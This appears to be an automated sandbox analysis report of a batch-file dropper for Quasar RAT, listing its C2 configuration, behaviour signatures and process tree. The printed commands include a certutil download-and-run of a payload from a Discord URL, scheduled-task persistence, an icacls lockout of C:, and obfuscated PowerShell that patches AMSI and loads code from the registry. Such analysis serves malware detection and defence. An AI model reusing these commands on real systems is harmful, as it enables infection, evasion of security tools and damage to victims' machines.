Analysis

  • max time kernel
    30s
  • max time network
    31s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 18:29

General

  • Target

    Fixer.bat

  • Size

    621B

  • MD5

    e235e723f57a72ef725306c3e14d4726

  • SHA1

    9b2153053f8e89c300e32da5df32e9b990594aac

  • SHA256

    aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67

  • SHA512

    0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RPad

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-okPqrmZ8kNVUcS4Rp0

Attributes
  • encryption_key

    XmcBnPuLlN1e8SHIRR1z

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-LOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:332
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{234b81d0-e5e6-4f30-92a4-562eafedbc77}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:532
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{447d8cc6-86e6-405d-a8fb-7c5d9f2cd742}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4028
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:516
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:728
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1072
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1088
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1104
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3016
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pZuHAzLzIuYM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qOSGCUteeyXLWt,[Parameter(Position=1)][Type]$wwWvJUZGOI)$TymOkcQsDML=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+[Char](108)+''+[Char](101)+''+[Char](99)+'te'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+'pe',''+[Char](67)+''+'l'+''+'a'+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+'e'+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'A'+''+'u'+''+[Char](116)+''+'o'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$TymOkcQsDML.DefineConstructor('RTSpe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$qOSGCUteeyXLWt).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+'a'+'n'+[Char](97)+''+[Char](103)+''+'e'+'d');$TymOkcQsDML.DefineMethod('In'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+'S'+[Char](105)+'g,'+'N'+''+'e'+''+[Char](119)+'S'+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+'a'+'l'+'',$wwWvJUZGOI,$qOSGCUteeyXLWt).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $TymOkcQsDML.CreateType();}$wjPXvKvaBLjuX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+'t'+'.'+''+'W'+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+'N'+[Char](97)+''+'t'+''+[Char](105)+'v'+'e'+''+[Char](77)+'e'+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+'s'+'');$mrItPHkfaVwmrT=$wjPXvKvaBLjuX.GetMethod(''+[Char](71)+'e'+[Char](116)+'Pr'+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+'b'+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+'t'+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZNlogdnDzTvedjEcdBl=pZuHAzLzIuYM @([String])([IntPtr]);$BjYrRIgPdYUbvBfXWjNhht=pZuHAzLzIuYM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XSqmdKgJWjN=$wjPXvKvaBLjuX.GetMethod('G'+[Char](101)+'tM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ShlNgSanhbKQuK=$mrItPHkfaVwmrT.Invoke($Null,@([Object]$XSqmdKgJWjN,[Object](''+'L'+'o'+[Char](97)+'d'+'L'+''+[Char](105)+'b'+'r'+''+[Char](97)+''+[Char](114)+'y'+'A'+'')));$WeBOGqeupOPInUyPh=$mrItPHkfaVwmrT.Invoke($Null,@([Object]$XSqmdKgJWjN,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'te'+'c'+'t')));$kLylpea=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ShlNgSanhbKQuK,$ZNlogdnDzTvedjEcdBl).Invoke(''+'a'+''+'m'+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$zykfUtiXEDQjfcpIe=$mrItPHkfaVwmrT.Invoke($Null,@([Object]$kLylpea,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+''+'a'+'n'+[Char](66)+'uf'+[Char](102)+''+[Char](101)+''+'r'+'')));$oUIcllZWpI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WeBOGqeupOPInUyPh,$BjYrRIgPdYUbvBfXWjNhht).Invoke($zykfUtiXEDQjfcpIe,[uint32]8,4,[ref]$oUIcllZWpI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zykfUtiXEDQjfcpIe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WeBOGqeupOPInUyPh,$BjYrRIgPdYUbvBfXWjNhht).Invoke($zykfUtiXEDQjfcpIe,[uint32]8,0x20,[ref]$oUIcllZWpI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+[Char](55)+'7'+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2864
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zxEtezLjDlDb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KnhOpWKLtCyIdb,[Parameter(Position=1)][Type]$ZzNWZiWbNX)$rVTcFPnzqmA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+'dD'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'em'+[Char](111)+'ryM'+'o'+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+',P'+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$rVTcFPnzqmA.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+'c'+'i'+[Char](97)+''+'l'+'N'+[Char](97)+''+'m'+''+[Char](101)+',H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'lic',[Reflection.CallingConventions]::Standard,$KnhOpWKLtCyIdb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+'g'+'e'+'d'+'');$rVTcFPnzqmA.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+'k'+''+[Char](101)+'',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$ZzNWZiWbNX,$KnhOpWKLtCyIdb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');Write-Output $rVTcFPnzqmA.CreateType();}$EHgUFbGUeEbLv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+'e'+'m'+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+'o'+'s'+'o'+''+[Char](102)+'t'+'.'+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+'e'+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+'o'+'d'+''+[Char](115)+'');$ltkeZtgtIVbEVR=$EHgUFbGUeEbLv.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+'d'+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rtGgIuJsleQjINDlrKO=zxEtezLjDlDb @([String])([IntPtr]);$XopytCtyFmAxZDnsFmEvWg=zxEtezLjDlDb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hDVdryEwrhh=$EHgUFbGUeEbLv.GetMethod(''+'G'+'e'+'t'+''+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+'n'+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'ernel'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+'l'+'l'+'')));$GrBvFhVLEyJCyC=$ltkeZtgtIVbEVR.Invoke($Null,@([Object]$hDVdryEwrhh,[Object](''+'L'+''+[Char](111)+'ad'+[Char](76)+''+'i'+''+'b'+''+'r'+'ar'+'y'+''+[Char](65)+'')));$rtnHZDIsPSQBXIIBa=$ltkeZtgtIVbEVR.Invoke($Null,@([Object]$hDVdryEwrhh,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+'ro'+'t'+''+[Char](101)+''+[Char](99)+'t')));$sKWVdBe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GrBvFhVLEyJCyC,$rtGgIuJsleQjINDlrKO).Invoke('am'+[Char](115)+''+'i'+'.dll');$hIexWFcVpgIyZKglR=$ltkeZtgtIVbEVR.Invoke($Null,@([Object]$sKWVdBe,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+'n'+[Char](66)+'u'+'f'+'f'+[Char](101)+''+'r'+'')));$QyDikKePjw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rtnHZDIsPSQBXIIBa,$XopytCtyFmAxZDnsFmEvWg).Invoke($hIexWFcVpgIyZKglR,[uint32]8,4,[ref]$QyDikKePjw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hIexWFcVpgIyZKglR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rtnHZDIsPSQBXIIBa,$XopytCtyFmAxZDnsFmEvWg).Invoke($hIexWFcVpgIyZKglR,[uint32]8,0x20,[ref]$QyDikKePjw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OFT'+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4796
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:2956
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1152
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1220
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1284
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2888
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                • Drops file in System32 directory
                                PID:1304
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1428
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                  1⤵
                                    PID:1444
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1452
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1540
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1588
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1632
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1668
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1744
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1752
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1852
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1864
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1900
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1960
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1524
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2132
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2232
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2296
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2304
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2416
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                      PID:2424
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2508
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2524
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2552
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2572
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2900
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:668
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2104
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3344
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3436
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"
                                                                                          2⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1504
                                                                                          • C:\Windows\system32\certutil.exe
                                                                                            certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe
                                                                                            3⤵
                                                                                              PID:1464
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"
                                                                                              3⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3972
                                                                                              • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4172
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f
                                                                                                  5⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:1768
                                                                                                • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4756
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                                    6⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:4872
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2604
                                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3872
                                                                                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                  "SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST
                                                                                                  5⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:4060
                                                                                            • C:\Windows\system32\icacls.exe
                                                                                              icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
                                                                                              3⤵
                                                                                              • Modifies file permissions
                                                                                              PID:4544
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
                                                                                              3⤵
                                                                                                PID:1368
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +h "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"
                                                                                                3⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:4032
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3580
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3760
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3912
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:696
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
